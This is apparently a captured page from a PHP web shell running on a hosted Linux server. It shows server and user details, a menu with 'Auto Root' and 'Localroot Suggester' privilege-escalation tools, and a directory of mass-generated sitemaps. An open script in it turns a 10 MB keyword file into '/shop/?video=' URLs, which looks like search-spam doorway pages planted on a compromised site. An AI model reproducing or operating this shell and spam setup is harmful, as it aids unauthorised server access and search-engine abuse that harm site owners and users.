Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.217.7
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
georgeto /
shop /
Delete
Unzip
Name
Size
Permission
Date
Action
config.php
65.14
KB
-rw-r--r--
2026-05-23 12:49
fetch.php
2.13
KB
-rw-r--r--
2026-05-23 12:49
google61f87189e043772b.html
53
B
-rw-r--r--
2026-05-23 12:50
index.php
508.83
KB
-rw-r--r--
2026-05-23 12:54
kw.txt
10.98
MB
-rw-r--r--
2026-05-23 13:00
sitemap-1.xml
913.3
KB
-rw-r--r--
2026-05-23 13:01
sitemap-10.xml
1.11
MB
-rw-r--r--
2026-05-23 13:01
sitemap-11.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-12.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-13.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-14.xml
1.11
MB
-rw-r--r--
2026-05-23 13:01
sitemap-15.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-16.xml
1.11
MB
-rw-r--r--
2026-05-23 13:01
sitemap-17.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-18.xml
1.1
MB
-rw-r--r--
2026-05-23 13:01
sitemap-19.xml
1.08
MB
-rw-r--r--
2026-05-23 13:01
sitemap-2.xml
1.03
MB
-rw-r--r--
2026-05-23 13:01
sitemap-20.xml
1.06
MB
-rw-r--r--
2026-05-23 13:01
sitemap-21.xml
1.15
MB
-rw-r--r--
2026-05-23 13:01
sitemap-22.xml
1.09
MB
-rw-r--r--
2026-05-23 13:01
sitemap-23.xml
1.07
MB
-rw-r--r--
2026-05-23 13:01
sitemap-24.xml
968.74
KB
-rw-r--r--
2026-05-23 13:01
sitemap-25.xml
867.25
KB
-rw-r--r--
2026-05-23 13:01
sitemap-26.xml
874.53
KB
-rw-r--r--
2026-05-23 13:01
sitemap-27.xml
868.92
KB
-rw-r--r--
2026-05-23 13:01
sitemap-28.xml
870.79
KB
-rw-r--r--
2026-05-23 13:01
sitemap-29.xml
869.06
KB
-rw-r--r--
2026-05-23 13:01
sitemap-3.xml
1.14
MB
-rw-r--r--
2026-05-23 13:01
sitemap-30.xml
871.85
KB
-rw-r--r--
2026-05-23 13:01
sitemap-31.xml
868.82
KB
-rw-r--r--
2026-05-23 13:01
sitemap-32.xml
869.66
KB
-rw-r--r--
2026-05-23 13:01
sitemap-33.xml
868.8
KB
-rw-r--r--
2026-05-23 13:01
sitemap-34.xml
879.95
KB
-rw-r--r--
2026-05-23 13:01
sitemap-35.xml
864.87
KB
-rw-r--r--
2026-05-23 13:01
sitemap-36.xml
869.11
KB
-rw-r--r--
2026-05-23 13:01
sitemap-37.xml
777.61
KB
-rw-r--r--
2026-05-23 13:01
sitemap-4.xml
1.08
MB
-rw-r--r--
2026-05-23 13:01
sitemap-5.xml
1.09
MB
-rw-r--r--
2026-05-23 13:01
sitemap-6.xml
1.15
MB
-rw-r--r--
2026-05-23 13:01
sitemap-7.xml
1.09
MB
-rw-r--r--
2026-05-23 13:01
sitemap-8.xml
1.13
MB
-rw-r--r--
2026-05-23 13:01
sitemap-9.xml
1.11
MB
-rw-r--r--
2026-05-23 13:01
sitemap-index.xml
3.36
KB
-rw-r--r--
2026-05-23 13:01
Save
Rename
<?php $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http"); $base_path = $protocol . "://" . $_SERVER['HTTP_HOST']; $domain_url = $base_path . '/shop/'; $base_url = $base_path . '/shop/?video='; $sitemap_name = 'sitemap'; $max_links_per_sitemap = 10000; $local_file = 'kw.txt'; $raw_lines = file($local_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $keywords = array_map('trim', $raw_lines); $keywords = array_filter($keywords); if (empty($keywords)) { die("❌ No valid keywords found in {$local_file}"); } $sitemap_index = '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL; $sitemap_index .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL; $sitemap_files = []; foreach ($keywords as $i => $keyword) { $clean_keyword = str_replace(' ', '+', $keyword); $encoded_keyword = $clean_keyword; $sitemap_num = ceil(($i + 1) / $max_links_per_sitemap); if (!isset($sitemap_files[$sitemap_num])) { $sitemap_files[$sitemap_num] = '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL; $sitemap_files[$sitemap_num] .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL; } $full_url = $base_url . $encoded_keyword; $escaped_url = htmlspecialchars($full_url, ENT_XML1, 'UTF-8'); $sitemap_files[$sitemap_num] .= " <url>" . PHP_EOL; $sitemap_files[$sitemap_num] .= " <loc>{$escaped_url}</loc>" . PHP_EOL; $sitemap_files[$sitemap_num] .= " </url>" . PHP_EOL; } foreach ($sitemap_files as $num => &$content) { $content .= '</urlset>' . PHP_EOL; $file_name = "{$sitemap_name}-{$num}.xml"; file_put_contents($file_name, $content); $sitemap_index .= " <sitemap>" . PHP_EOL; $sitemap_index .= " <loc>" . htmlspecialchars($domain_url . $file_name, ENT_XML1, 'UTF-8') . "</loc>" . PHP_EOL; $sitemap_index .= " </sitemap>" . PHP_EOL; } $sitemap_index .= '</sitemapindex>' . PHP_EOL; file_put_contents("sitemap-index.xml", $sitemap_index); echo "✅ Sitemap(s) created from local file '{$local_file}'.\n"; ?>